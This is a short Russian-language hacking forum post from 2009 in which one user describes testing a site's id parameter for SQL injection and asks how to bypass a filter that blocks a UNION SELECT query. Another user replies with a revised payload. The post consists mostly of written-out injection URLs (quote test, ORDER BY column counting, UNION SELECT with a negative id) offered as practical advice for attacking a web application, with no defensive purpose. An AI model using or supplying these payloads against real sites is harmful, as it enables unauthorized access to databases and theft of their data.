09.10.2009, 15:39
|
|
Новичок
Регистрация: 14.09.2009
Сообщений: 8
Провел на форуме:
21921
Репутация:
4
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Пробуй вот так
http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод
зачем тебе and+1=2 ?!?!
|
|
|